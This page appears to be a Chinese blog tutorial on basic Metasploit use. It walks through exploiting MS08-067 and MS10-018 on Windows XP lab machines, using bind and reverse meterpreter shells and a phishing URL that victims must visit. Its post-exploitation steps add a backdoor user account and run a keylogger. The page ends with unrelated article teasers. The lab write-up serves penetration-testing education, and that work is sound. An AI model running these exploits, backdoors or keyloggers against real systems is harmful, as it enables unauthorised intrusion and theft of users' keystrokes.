news 2026/3/18 12:06:27

MSF的基础使用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
MSF的基础使用

以两个windows主机层面的漏洞,简单演示一下msf框架的使用。

MS08-067

简介

影响范围:MS08-067漏洞会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

漏洞产生的原因及攻击效果:如果用户在受影响的系统上收到特制的 RPC 请求,则可能导致攻击者在未经身份验证的情况下利用此漏洞运行任意代码,实现远程代码执行。现阶段,已经可以通过防火墙来阻断该漏洞的攻击。

漏洞利用

先测试网络连通性

1.输入msfconsole进入msf终端

2.查找利用ms08-067漏洞利用模块

search ms08-067
use exploit/windows/smb/ms08_067_netapi

3.查看该攻击模块下所需的配置信息

show options

4.设置options

设置攻击payload为bind模式

set payload windows/meterpreter/bind_tcp

reverse_tcp 反弹shell xp主动连接kali

bind_tcp:主动连接 kali主动攻击xp 不需要xp主机用户做啥操作,啥都不做就会被打

设置靶机地址:

set RHOST 192.168.1.6

查看targets

选择攻击目标

set target 34

5.检查options配置

6.expliot利用该漏洞 出现meterpreter则代表利用成功 拿到了系统的shell

后渗透

出现meterpreter则代表漏洞利用成功 接下来可以做一些后渗透的动作了

比如查看配置 进入win命令行 添加用户 键盘监听等

1.进入Windows Shell

shell

刚刚还是在msf攻击的控制台 现在是在windows的shell命令行

2.添加用户

net user didi 123 /add

3.使用 ps 查看进程

4.使用ps找到合适的进程进行迁移,迁移到有管理员权限的进程

比如我迁移到ie浏览器进程

开启键盘记录后 在xp浏览器端不管键盘敲什么都会被记录下来

执行keyscan_dump查看记录的情况

keyscan_stop 关闭键盘记录

MS10-018漏洞

简介

MS10-018是IE浏览器上的漏洞,主要危害Internet Explorer 6~7,攻击者可以通过该漏洞获取受害主机的控制权。

┗|`O′|┛ 嗷~~ 是打浏览器的漏洞,不是打系统的,但是同样可以达到RCE的效果

漏洞利用

实验环境:kali虚拟机 winxp虚拟机

先把防火墙打开 否则不需要受害者主机浏览器访问触发反弹shell就能执行成功

msf杀死某个session的命令

sessions -k 1

1.启动msf 搜索ms10_018

msfconsole search ms10_018

2.使用对应的exploit

use exploit/windows/browser/ms10_018_ie_behaviors

3.查看需要的配置 并且进行配置

payload采用reverse_tcp反弹shell的方式

所以需要反弹地址SRVHOST

可以设置其他地址 我们还是设置kali机器为反弹地址

此外也可以设置一下 URIPATH 这是钓鱼网站的url 需要受害者主机去访问该url 才能进行反弹shell

set SRVHOST 192.168.1.134 set URIPATH test666

查看修改后的配置

4.运行exploit

5.受害者主机访问http://192.168.1.134:8080/test666

6.反弹shell成功

7.进入会话中利用该会话

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/15 15:10:49

[技术讨论] 三极管高低温特性测试

三极管控制电路是很常见的,但是设计不好的时候,也会导致电路正常的工作。比如下面两个电路,仅仅是集电极电阻不一样,也就是流过集电极的电流不一样,最后仿真的结果就会显示三极管BE的压降不相同,一个是0.77…

作者头像 李华
网站建设 2026/3/17 7:34:18

Semgrep终极指南:快速掌握跨平台静态代码分析利器

Semgrep终极指南:快速掌握跨平台静态代码分析利器 【免费下载链接】semgrep Lightweight static analysis for many languages. Find bug variants with patterns that look like source code. 项目地址: https://gitcode.com/GitHub_Trending/se/semgrep 告别…

作者头像 李华
网站建设 2026/3/15 15:08:21

LangChain RAG-MultiVector实现多向量检索文档

01. 多表征/向量索引多个维度记录信息 等同于为文档块生成 多个向量,支持的方法如下:把文档切割成更小的块:通过检索更小的块,但是查找其父类文档(ParentDocumentRetriever)。摘要:使用 LLM 为每…

作者头像 李华
网站建设 2026/3/15 11:11:29

鸿蒙PC UI控件库 - SecondaryButton 次要按钮详解

视频演示地址: 📋 目录 概述特性快速开始API 参考使用示例主题配置最佳实践常见问题总结 概述 SecondaryButton 是控件库中的次要按钮组件,适用于次要操作场景。与 PrimaryButton 的主要区别在于: PrimaryButton:实…

作者头像 李华
网站建设 2026/3/15 15:03:30

不花一分钱!2025年免费降低AI率的5个有效方法与工具指南

在论文、报告、内容创作越来越严格的时代,查AI率、检测AI率、降AI率 已经成为学生、写作者、博主的日常需求。很多同学因为 AI率过高被导师指出“AI痕迹太重”,甚至退回重写。本文今天一次性告诉你: 检测AI率应该注意什么 免费查AI率的网站有…

作者头像 李华